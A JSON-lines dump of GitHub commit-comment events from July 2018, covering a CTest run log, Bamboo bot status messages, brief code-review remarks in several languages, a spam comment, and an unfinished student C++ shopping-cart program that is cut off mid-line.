{"id":"7976059471","type":"CommitCommentEvent","actor":{"login":"N-Dekker"},"repo":{"name":"SuperElastix/SuperElastix"},"payload":{"comment":{"id":29733260,"position":null,"line":null,"path":null,"commit_id":"1eaf68f950f84409cd73b8f1766d5688e12ed8e6","created_at":"2018-07-17T11:24:35Z","updated_at":"2018-07-17T11:24:35Z","author_association":"MEMBER","body":"VS2015 Release RUN_TESTS says: \r\n> 100% tests passed, 0 tests failed out of 59 \r\nSo is it OK to merge #281 PR for #280 (Fix GetComponentName() interface issues)?\r\n\r\nComplete output VS2015 Release RUN_TESTS:\r\n1>------ Build started: Project: RUN_TESTS, Configuration: Release x64 ------\r\n1>  Test project F:/X/Bin/vc14-64/SelxDev/R/SuperElastix-build\r\n1>        Start  1: LoggerImplTest.Initialization\r\n1>   1/62 Test  #1: LoggerImplTest.Initialization ..................................   Passed    0.06 sec\r\n1>        Start  2: LoggerImplTest.Console\r\n1>   2/62 Test  #2: LoggerImplTest.Console .........................................   Passed    0.04 sec\r\n1>        Start  3: LoggerImplTest.MemoryManagement\r\n1>   3/62 Test  #3: LoggerImplTest.MemoryManagement ................................   Passed    0.04 sec\r\n1>        Start  4: BlueprintTest.SetGetDeleteComponent\r\n1>   4/62 Test  #4: BlueprintTest.SetGetDeleteComponent ............................   Passed    0.09 sec\r\n1>        Start  5: BlueprintTest.BlueprintObjectSetGetDeleteComponent\r\n1>   5/62 Test  #5: BlueprintTest.BlueprintObjectSetGetDeleteComponent .............   Passed    0.07 sec\r\n1>        Start  6: BlueprintTest.SetGetDeleteConnection\r\n1>   6/62 Test  #6: BlueprintTest.SetGetDeleteConnection ...........................   Passed    0.06 sec\r\n1>        Start  7: BlueprintTest.CopyConstuctor\r\n1>   7/62 Test  #7: BlueprintTest.CopyConstuctor ...................................   Passed    0.06 sec\r\n1>        Start  8: BlueprintTest.Compose\r\n1>   8/62 Test  #8: BlueprintTest.Compose ..........................................   Passed    0.06 sec\r\n1>        Start  9: BlueprintTest.ReadXMLWriteDot\r\n1>   9/62 Test  #9: BlueprintTest.ReadXMLWriteDot ..................................   Passed    0.06 sec\r\n1>        Start 10: BlueprintTest.ReadJsonWriteDot\r\n1>  10/62 Test #10: BlueprintTest.ReadJsonWriteDot .................................   Passed    0.08 sec\r\n1>        Start 11: BlueprintTest.ParallelConnections\r\n1>  11/62 Test #11: BlueprintTest.ParallelConnections ..............................   Passed    0.06 sec\r\n1>        Start 12: BlueprintTest.ReadParallelConnections\r\n1>  12/62 Test #12: BlueprintTest.ReadParallelConnections ..........................   Passed    0.06 sec\r\n1>        Start 13: DisplacementFieldImageWarperComponentTest.SinkAndSource\r\n1>  13/62 Test #13: DisplacementFieldImageWarperComponentTest.SinkAndSource ........   Passed    1.00 sec\r\n1>        Start 14: DisplacementFieldMeshWarperComponentTest.SinkAndSource\r\n1>  14/62 Test #14: DisplacementFieldMeshWarperComponentTest.SinkAndSource .........   Passed    1.01 sec\r\n1>        Start 15: ElastixComponentTest.MonolithicElastixTransformix\r\n1>  15/62 Test #15: ElastixComponentTest.MonolithicElastixTransformix ..............   Passed   22.57 sec\r\n1>        Start 16: AnyFileIOTest.Readers\r\n1>  16/62 Test #16: AnyFileIOTest.Readers ..........................................   Passed    0.85 sec\r\n1>        Start 17: AnyFileIOTest.Writers\r\n1>  17/62 Test #17: AnyFileIOTest.Writers ..........................................   Passed    0.42 sec\r\n1>        Start 18: ComponentSelectorTest.EmptyComponentList\r\n1>  18/62 Test #18: ComponentSelectorTest.EmptyComponentList .......................   Passed    1.29 sec\r\n1>        Start 19: ComponentSelectorTest.FilledComponentList\r\n1>  19/62 Test #19: ComponentSelectorTest.FilledComponentList ......................   Passed    0.58 sec\r\n1>        Start 20: ComponentSelectorTest.SetEmptyCriteria\r\n1>  20/62 Test #20: ComponentSelectorTest.SetEmptyCriteria .........................   Passed    0.56 sec\r\n1>        Start 21: ComponentSelectorTest.SetSufficientCriteria\r\n1>  21/62 Test #21: ComponentSelectorTest.SetSufficientCriteria ....................   Passed    0.55 sec\r\n1>        Start 22: ComponentSelectorTest.AddCriteria\r\n1>  22/62 Test #22: ComponentSelectorTest.AddCriteria ..............................   Passed    0.62 sec\r\n1>        Start 23: ComponentSelectorTest.InterfacedObjects\r\n1>  23/62 Test #23: ComponentSelectorTest.InterfacedObjects ........................   Passed    0.56 sec\r\n1>        Start 24: ComponentSelectorTest.UnknownComponent\r\n1>  24/62 Test #24: ComponentSelectorTest.UnknownComponent .........................   Passed    0.56 sec\r\n1>        Start 25: InterfaceTest.InterfaceNameTraits\r\n1>  25/62 Test #25: InterfaceTest.InterfaceNameTraits ..............................   Passed    0.57 sec\r\n1>        Start 26: InterfaceTest.DynamicCast\r\n1>  26/62 Test #26: InterfaceTest.DynamicCast ......................................   Passed    0.60 sec\r\n1>        Start 27: InterfaceTest.ConnectByName\r\n1>  27/62 Test #27: InterfaceTest.ConnectByName ....................................   Passed    0.60 sec\r\n1>        Start 28: InterfaceTest.ConnectAll\r\n1>  28/62 Test #28: InterfaceTest.ConnectAll .......................................   Passed    0.57 sec\r\n1>        Start 29: NetworkBuilderTest.Create\r\n1>  29/62 Test #29: NetworkBuilderTest.Create ......................................   Passed    0.65 sec\r\n1>        Start 30: NetworkBuilderTest.Configure\r\n1>  30/62 Test #30: NetworkBuilderTest.Configure ...................................   Passed    0.68 sec\r\n1>        Start 31: NetworkBuilderTest.Connect\r\n1>  31/62 Test #31: NetworkBuilderTest.Connect .....................................   Passed    0.56 sec\r\n1>        Start 32: NetworkBuilderTest.DeduceComponentsFromConnections\r\n1>  32/62 Test #32: NetworkBuilderTest.DeduceComponentsFromConnections .............   Passed    0.73 sec\r\n1>        Start 33: itkImageFilterTest.Run\r\n1>  33/62 Test #33: itkImageFilterTest.Run .........................................   Passed    0.90 sec\r\n1>        Start 34: NiftyregComponentTest.Register2d_nifti\r\n1>  34/62 Test #34: NiftyregComponentTest.Register2d_nifti .........................   Passed    1.57 sec\r\n1>        Start 35: NiftyregComponentTest.ItkToNiftiImage\r\n1>  35/62 Test #35: NiftyregComponentTest.ItkToNiftiImage ..........................   Passed    0.58 sec\r\n1>        Start 36: NiftyregComponentTest.NiftiToItkImage\r\n1>  36/62 Test #36: NiftyregComponentTest.NiftiToItkImage ..........................   Passed    0.49 sec\r\n1>        Start 37: NiftyregComponentTest.Register2d_itkImages\r\n1>  37/62 Test #37: NiftyregComponentTest.Register2d_itkImages .....................   Passed    0.51 sec\r\n1>        Start 38: NiftyregComponentTest.WBIRDemo\r\n1>  38/62 Test #38: NiftyregComponentTest.WBIRDemo .................................   Passed    0.59 sec\r\n1>        Start 39: NiftyregComponentTest.AladinWBIRDemo\r\n1>  39/62 Test #39: NiftyregComponentTest.AladinWBIRDemo ...........................   Passed    0.56 sec\r\n1>        Start 40: NiftyregComponentTest.AffineAndBSpline\r\n1>  40/62 Test #40: NiftyregComponentTest.AffineAndBSpline .........................   Passed    0.60 sec\r\n1>        Start 41: NiftiItkConversionsTest.ItkToNiftiImageSharedDataRemoveNifti\r\n1>  41/62 Test #41: NiftiItkConversionsTest.ItkToNiftiImageSharedDataRemoveNifti ...   Passed    0.52 sec\r\n1>        Start 42: NiftiItkConversionsTest.ItkToNiftiImageSharedDataRemoveItk\r\n1>  42/62 Test #42: NiftiItkConversionsTest.ItkToNiftiImageSharedDataRemoveItk .....   Passed    0.55 sec\r\n1>        Start 43: NiftiItkConversionsTest.ItkToNiftiImageCopiedData\r\n1>  43/62 Test #43: NiftiItkConversionsTest.ItkToNiftiImageCopiedData ..............   Passed    0.53 sec\r\n1>        Start 44: NiftiItkConversionsTest.NiftiToItkImage\r\n1>  44/62 Test #44: NiftiItkConversionsTest.NiftiToItkImage ........................   Passed    0.50 sec\r\n1>        Start 45: NiftyregItkHybridComponentTest.AladinAndItk\r\n1>  45/62 Test #45: NiftyregItkHybridComponentTest.AladinAndItk ....................   Passed    2.95 sec\r\n1>        Start 46: RegistrationItkv4Test.3DImagesOnly\r\n1>  46/62 Test #46: RegistrationItkv4Test.3DImagesOnly .............................***Not Run (Disabled)   0.00 sec\r\n1>        Start 47: RegistrationItkv4Test.3DANTSCCMetric\r\n1>  47/62 Test #47: RegistrationItkv4Test.3DANTSCCMetric ...........................***Not Run (Disabled)   0.00 sec\r\n1>        Start 48: RegistrationItkv4Test.3DMeanSquaresMetric\r\n1>  48/62 Test #48: RegistrationItkv4Test.3DMeanSquaresMetric ......................***Not Run (Disabled)   0.00 sec\r\n1>        Start 49: RegistrationItkv4Test.FullyConfigured3d\r\n1>  49/62 Test #49: RegistrationItkv4Test.FullyConfigured3d ........................   Passed    1.27 sec\r\n1>        Start 50: RegistrationItkv4Test.FullyConfigured3dAffine\r\n1>  50/62 Test #50: RegistrationItkv4Test.FullyConfigured3dAffine ..................   Passed    1.21 sec\r\n1>        Start 51: RegistrationItkv4Test.CompositeTransform\r\n1>  51/62 Test #51: RegistrationItkv4Test.CompositeTransform .......................   Passed    1.59 sec\r\n1>        Start 52: RegistrationItkv4Test.TransformSink\r\n1>  52/62 Test #52: RegistrationItkv4Test.TransformSink ............................   Passed    0.88 sec\r\n1>        Start 53: RegistrationItkv4Test.TransformSource\r\n1>  53/62 Test #53: RegistrationItkv4Test.TransformSource ..........................   Passed    0.61 sec\r\n1>        Start 54: SyNRegistrationItkv4Test.FullyConfigured3d\r\n1>  54/62 Test #54: SyNRegistrationItkv4Test.FullyConfigured3d .....................   Passed    5.24 sec\r\n1>        Start 55: SyNRegistrationItkv4Test.WBIRDemo\r\n1>  55/62 Test #55: SyNRegistrationItkv4Test.WBIRDemo ..............................   Passed    1.76 sec\r\n1>        Start 56: SuperElastixFilterTest.ImageOnly\r\n1>  56/62 Test #56: SuperElastixFilterTest.ImageOnly ...............................   Passed    2.14 sec\r\n1>        Start 57: SuperElastixFilterTest.ImageAndMesh\r\n1>  57/62 Test #57: SuperElastixFilterTest.ImageAndMesh ............................   Passed    1.08 sec\r\n1>        Start 58: SuperElastixFilterTest.TooManyInputs\r\n1>  58/62 Test #58: SuperElastixFilterTest.TooManyInputs ...........................   Passed    1.08 sec\r\n1>        Start 59: SuperElastixFilterTest.TooManySources\r\n1>  59/62 Test #59: SuperElastixFilterTest.TooManySources ..........................   Passed    1.14 sec\r\n1>        Start 60: SuperElastixFilterTest.TooManyOutputs\r\n1>  60/62 Test #60: SuperElastixFilterTest.TooManyOutputs ..........................   Passed    1.11 sec\r\n1>        Start 61: SuperElastixFilterTest.TooManySinks\r\n1>  61/62 Test #61: SuperElastixFilterTest.TooManySinks ............................   Passed    1.11 sec\r\n1>        Start 62: SuperElastixFilterTest.UnsatisfiedConnections\r\n1>  62/62 Test #62: SuperElastixFilterTest.UnsatisfiedConnections ..................   Passed    1.13 sec\r\n1>\r\n1>  100% tests passed, 0 tests failed out of 59\r\n1>\r\n1>  Total Test time (real) =  68.58 sec\r\n1>\r\n1>  The following tests did not run:\r\n1>  \t 46 - RegistrationItkv4Test.3DImagesOnly (Disabled)\r\n1>  \t 47 - RegistrationItkv4Test.3DANTSCCMetric (Disabled)\r\n1>  \t 48 - RegistrationItkv4Test.3DMeanSquaresMetric (Disabled)\r\n========== Build: 1 succeeded, 0 failed, 1 up-to-date, 0 skipped ==========\r\n\r\n\r\n"}},"created_at":"2018-07-17T11:24:35Z"}
{"id":"7976080332","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733331,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-17T11:29:07Z","updated_at":"2018-07-17T11:29:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T11:29:07Z"}
{"id":"7976081451","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29733335,"position":14,"line":14,"path":"cap3/3_5_4.sql","commit_id":"31fe355ec92c03e9db464425b116ada3c8cf3982","created_at":"2018-07-17T11:29:22Z","updated_at":"2018-07-17T11:29:22Z","author_association":"COLLABORATOR","body":"成田\r\nコメントが少し翻訳になってしまっています。\r\nここは出題の言葉で「貸し出し日が2012年3月31日以下のレコード」「貸し出し中(\"0\")のレコード」と書いたほうがいいかと思います。"}},"created_at":"2018-07-17T11:29:22Z"}
{"id":"7976084678","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29733351,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-17T11:30:04Z","updated_at":"2018-07-17T11:30:04Z","author_association":"CONTRIBUTOR","body":"Why the extra variable and the extra argument?\r\nThe `start` is present in the header, just use it."}},"created_at":"2018-07-17T11:30:04Z"}
{"id":"7976088040","type":"CommitCommentEvent","actor":{"login":"enyo"},"repo":{"name":"dart-lang/rpc"},"payload":{"comment":{"id":29733359,"position":5,"line":190,"path":"lib/src/parser.dart","commit_id":"dc8dc4cbfd180d75c8303f9187483b0849626d1e","created_at":"2018-07-17T11:30:45Z","updated_at":"2018-07-17T11:30:45Z","author_association":"CONTRIBUTOR","body":"Oh nice! I didn't know there was a `whereType<T>` method."}},"created_at":"2018-07-17T11:30:45Z"}
{"id":"7976092646","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29733373,"position":5,"line":300,"path":"languagetool-office-extension/src/main/java/org/languagetool/openoffice/LOFlatParagraph.java","commit_id":"9b41c40f8966cc88c36acc056ea5ee0d95e811f0","created_at":"2018-07-17T11:31:44Z","updated_at":"2018-07-17T11:31:44Z","author_association":"CONTRIBUTOR","body":"Sorry, that's a copy/paste error"}},"created_at":"2018-07-17T11:31:44Z"}
{"id":"7976095388","type":"CommitCommentEvent","actor":{"login":"PauletteFrench"},"repo":{"name":"pkmital/tensorflow_tutorials"},"payload":{"comment":{"id":29733382,"position":null,"line":null,"path":null,"commit_id":"610958c7fb723db672f2ade89f140accfd0a0646","created_at":"2018-07-17T11:32:19Z","updated_at":"2018-07-17T11:32:19Z","author_association":"NONE","body":"Had been in pursuit of the game for a long time but couldn't find it anywhere. An article that I read at [https://assignmentman.co.uk/](https://assignmentman.co.uk/) contained a link to the solution here and thankfull I found the code I needed."}},"created_at":"2018-07-17T11:32:19Z"}
{"id":"7976096369","type":"CommitCommentEvent","actor":{"login":"lacj2000"},"repo":{"name":"fabiocardosojr/lims"},"payload":{"comment":{"id":29733384,"position":null,"line":null,"path":null,"commit_id":"efb2063f6333cc4a048cb819c776c62a50e5fa63","created_at":"2018-07-17T11:32:33Z","updated_at":"2018-07-17T11:32:33Z","author_association":"COLLABORATOR","body":"border -> front end"}},"created_at":"2018-07-17T11:32:33Z"}
{"id":"7976096400","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733385,"position":605,"line":2134,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:32:34Z","updated_at":"2018-07-17T11:32:34Z","author_association":"OWNER","body":"Yep, je vais les laisser sur les gates et mettre NOCACHE sur les dividers et mux, car oui le driver DRM va jouer derriere le dos de CCF jusqu'a switch final."}},"created_at":"2018-07-17T11:32:34Z"}
{"id":"7976096742","type":"CommitCommentEvent","actor":{"login":"enyo"},"repo":{"name":"dart-lang/rpc"},"payload":{"comment":{"id":29733386,"position":4,"line":52,"path":"bin/generate.dart","commit_id":"dc8dc4cbfd180d75c8303f9187483b0849626d1e","created_at":"2018-07-17T11:32:38Z","updated_at":"2018-07-17T11:32:38Z","author_association":"CONTRIBUTOR","body":"Maybe instead of adding the `ignore: missing_return` comment, this is cleaner:\r\n\r\n```dart\r\n  ArgResults results;\r\n  try {\r\n    results = parser.parse(arguments);\r\n  } on FormatException catch (e) {\r\n    dieWithUsage('Error parsing arguments:\\n${e.message}\\n');\r\n  }\r\n  return results;\r\n```\r\n\r\n"}},"created_at":"2018-07-17T11:32:38Z"}
{"id":"7976101490","type":"CommitCommentEvent","actor":{"login":"dagewa"},"repo":{"name":"dials/dials"},"payload":{"comment":{"id":29733394,"position":null,"line":null,"path":null,"commit_id":"fc02dea019b9932e6478eb7e1ec92466534a227a","created_at":"2018-07-17T11:33:39Z","updated_at":"2018-07-17T11:33:39Z","author_association":"MEMBER","body":"DUI could run it twice, but that hits complications with the implicit nodes, which I don't think are fully robust yet. In the meantime, DUI users may well be doing the wrong thing with the refinement step, and this was intended as a simple fix.\r\n\r\nI don't know about making a default for the command line. Personally, at the command line I prefer more fine-grained control and I like to look at the output of the static job before running the scan-varying one. I also like it to be easy to change which parameters are fixed between the jobs (use case as described in the commit message). "}},"created_at":"2018-07-17T11:33:39Z"}
{"id":"7976103142","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733399,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-17T11:33:59Z","updated_at":"2018-07-17T11:33:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T11:33:59Z"}
{"id":"7976104340","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"facetoe/zenpy"},"payload":{"comment":{"id":29733406,"position":null,"line":null,"path":null,"commit_id":"d33ae7f94157981ff83f2fb6c2bfa0d8fc226a9e","created_at":"2018-07-17T11:34:14Z","updated_at":"2018-07-17T11:34:14Z","author_association":"OWNER","body":"Ahh yes I need to release a new version that contains this fix. Thanks for the report!"}},"created_at":"2018-07-17T11:34:14Z"}
{"id":"7976105484","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733407,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-17T11:34:28Z","updated_at":"2018-07-17T11:34:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T11:34:28Z"}
{"id":"7976109023","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733411,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-17T11:35:15Z","updated_at":"2018-07-17T11:35:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T11:35:15Z"}
{"id":"7976112193","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733422,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-17T11:35:56Z","updated_at":"2018-07-17T11:35:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T11:35:56Z"}
{"id":"7976118023","type":"CommitCommentEvent","actor":{"login":"timelover1"},"repo":{"name":"timelover1/shen"},"payload":{"comment":{"id":29733439,"position":7,"line":7,"path":"README.md","commit_id":"4eff598a1eaecb12ede6f1cff4c62608d642dbea","created_at":"2018-07-17T11:37:11Z","updated_at":"2018-07-17T11:37:11Z","author_association":"OWNER","body":"X = [10 11 12 1 2 3 4 5 6 7 ];\r\nY = [12566 12666 12768 12908 12688 13129 13455 13522 13156 12955];\r\nPlot(X,Y,’r*’);\r\nhold on\r\ny=13207.83*x-67586.46\r\nPlot(X,y)"}},"created_at":"2018-07-17T11:37:11Z"}
{"id":"7976118720","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29733443,"position":41,"line":685,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T11:37:21Z","updated_at":"2018-07-17T11:37:21Z","author_association":"COLLABORATOR","body":"yeah, typo."}},"created_at":"2018-07-17T11:37:21Z"}
{"id":"7976119964","type":"CommitCommentEvent","actor":{"login":"Thunderforrain"},"repo":{"name":"Thunderforrain/C-"},"payload":{"comment":{"id":29733449,"position":null,"line":null,"path":null,"commit_id":"8531b82d89a23140ad296f1baca5347972cfbf1f","created_at":"2018-07-17T11:37:37Z","updated_at":"2018-07-17T11:37:37Z","author_association":"OWNER","body":"#include <iostream>\r\n#include <string>\r\nusing namespace std;\r\n\r\nclass Fruit\r\n{\r\nprivate:\r\n    int number;\r\n    string name;\r\n    double purchaseprice,saleprice;\r\n\r\npublic:\r\n    friend class FruitKind;\r\n    Fruit(int new_number=0,string new_name=\" \",double new_purchaseprice=0,double saleprice=0)\r\n    :number(new_number),name(new_name),purchaseprice(new_purchaseprice){}\r\n    void SetFruitName(string new_name) {name=new_name;}\r\n    void SetPurchasePrice(double new_purchaseprice) {purchaseprice=new_purchaseprice;}\r\n    void Setsaleprice(double new_saleprice) {saleprice=new_saleprice;}\r\n    void Setnumber(int new_number) {number=new_number;}\r\n    string GetFruitName() {return name;}\r\n    double GetPrice() {return saleprice;}\r\n    double Getchajia() {return saleprice-purchaseprice;}\r\n    int GetNumber() {return number;}\r\n};\r\nclass Fruitkind{\r\nprivate:\r\n    Fruit *discKind,*reguKind;\r\n    int discKindLength,reguKindLength,initFruitKind;\r\npublic:\r\n    Fruitkind(int b=0,int c=0){\r\n        reguKindLength=b;\r\n        discKindLength=c;\r\n    }\r\n    void AddDiscKind(){};\r\n    void AddReguKind(){};\r\n    void InitFruitKind(){};\r\n    void DispFruitKind(){};\r\n    string GetDiscFruit(int i=0){return discKind[i]}\r\n    string GetReguFruit(int i=0){return reguKind[i]}\r\n    void DispReguFruitKind();{\r\n        cout<<\"正价水果有：\"<<endl;\r\n        for(int i=0;i<reguKindLength;i++){\r\n            cout<<\"水果编号：\"<<i+1<<\"，\"<<\"水果名称：\"<<reguKind[i]<<\"，\"<<\"售价：\"<<reguoutp[i]<<endl;\r\n        }\r\n    }\r\n    void DispDiscFruitKind(){\r\n        cout<<\"特价水果有：\"<<endl;\r\n        for(int i=0;i<discKindLength;i++){\r\n            cout<<\"水果编号：\"<<i+1<<\"，\"<<\"水果名称：\"<<discKind[i]<<\"，\"<<\"售价：\"<<discoutp[i]<<endl;\r\n        }\r\n    }\r\n};\r\nclass CartItem{\r\nprivate:\r\n    Fruit *f;\r\n    double weight,money;\r\npublic:\r\n\r\n    CartItem(RegularFruit &a[a1],float a,float b){\r\n        weight=b;\r\n        money=b*a[a1].reguoutp[a1];\r\n    }\r\n     CartItem(DiscountFruit &a[a1],float a,float b){\r\n        weight=b;\r\n        money=b*a[a1].discoutp[a1];\r\n    }\r\n    void DispCartItem(){\r\n        cout<<\"水果编号：\"<<a1<<\"，\"<<\"水果名称：\"<<reguKind[a1]<<\"，\"<<\"售价：\"<<reguoutp[a1]<<endl;\r\n    }\r\n    float GetMoney(){ return money;}\r\n    float GetFruit(){return 0;}\r\n    float GetWeight(){return weight;}\r\n};\r\n\r\n\r\nclass Cart{\r\nprivate:\r\n    string *car;\r\n    static int count=0;\r\npublic:\r\n    Cart(int i){\r\n        car=string [20];\r\n        if(i==1){\r\n                car[0]=\"apple\";\r\n                count++;\r\n        }\r\n        else if(i==2){\r\n            car[1}=\"banana\";\r\n            count++;\r\n            }\r\n        else {\r\n            car[2]=\"orange\";\r\n            count++;\r\n            }\r\n    }\r\n    void AddItem(string a){car[count]=a;}\r\n    void DeleteItem(string a){\r\n        for(i=0;i<count;i++){\r\n            if(a==car[i]){\r\n                car[i]=\"000\";\r\n            }\r\n        }\r\n    }\r\n    void CheckOut(){return 0;}\r\n    void DispCart(){\r\n        for(i=0;i<count;i++){\r\n             cout<<car[i]<<\" \";\r\n        }\r\n    }\r\n};\r\nvoid Out(char a){\r\n    cout<<\"欢迎光临本店，请选择相应的功能！\"<<endl;\r\n    cout<<\"A/a 买水果...\"<<endl;\r\n    cout<<\"D/d 退水果...\"<<endl;\r\n    cout<<\"C/c 结账...\"<<endl;\r\n    cout<<\"M/m 查看销售总额...\"<<endl;\r\n    cout<<\"P/p 查看利润...\"<<endl;\r\n    cout<<\"Q/q 退出系统...\"<<endl;\r\n    if(a=='a'||a=='A'){\r\n        cout<<\"正价水果有：\"<<endl;\r\n    cout<<b1[y].DispReguFruitKind;\r\n    cout<<\"正价水果有：\"<<endl;\r\n    cout<<b1[y].DispDiscFruitKind;\r\n    }\r\n    if(a=='d'||a=='D'){\r\n\r\n    }\r\n    if(a=='c'||a=='C'){\r\n        cout<<\"合计金额为：\"\r\n    }\r\n    if(a=='m'||a=='M'){\r\n       cout<<\"当前销售总额为：\"\r\n    }\r\n    if(a=='p'||a=='P'){\r\n        cout<<\"当前利润为：\"\r\n    }\r\n    if(a=='q'||a=='Q'){\r\n\r\n    }\r\n}\r\nint main(){friend class CartItem;\r\n    float  x,y;\r\n\r\n    cout<<\"请先初始化水果种类，首先请输入正价水果的种类\"<<endl;\r\n    cout<<\"请输入要添加正价水果种类的数量：\"<<endl;\r\n    cin>>x;\r\n    RegularFruit *a1=new RegularFruit[x];\r\n    RegularFruit(x);\r\n    for(int i=1;i<=x;i++){\r\n        string a,float b,float c;\r\n        cout<<\"请输入第 \"<<i<<\"  种正价水果的名称：\"<<endl;\r\n        cin>>a;\r\n        cout<<\"请输入第 \"<<i<<\"  种正价水果的进价：\"<<endl;\r\n        cin>>b;\r\n        cout<<\"请输入第 \"<<i<<\"  种正价水果的售价：\"<<endl;\r\n        cin>>c;\r\n        a1[i-1].AddReguKind(a,b,c);\r\n    }\r\n    cout<<\"正价水果种类已录入完毕，请输入特价水果种类：\"<<endl;\r\n    cout<<\"请输入要添加特价水果种类的数量：\"<<endl;\r\n    cin>>y;\r\n    DiscountFruit *b1=new DiscountFruit[y];\r\n    DiscountFruit(y);\r\n    for(int i=1;i<=y;i++){\r\n        string a,float b,float c;\r\n        cout<<\"请输入第 \"<<i<<\"  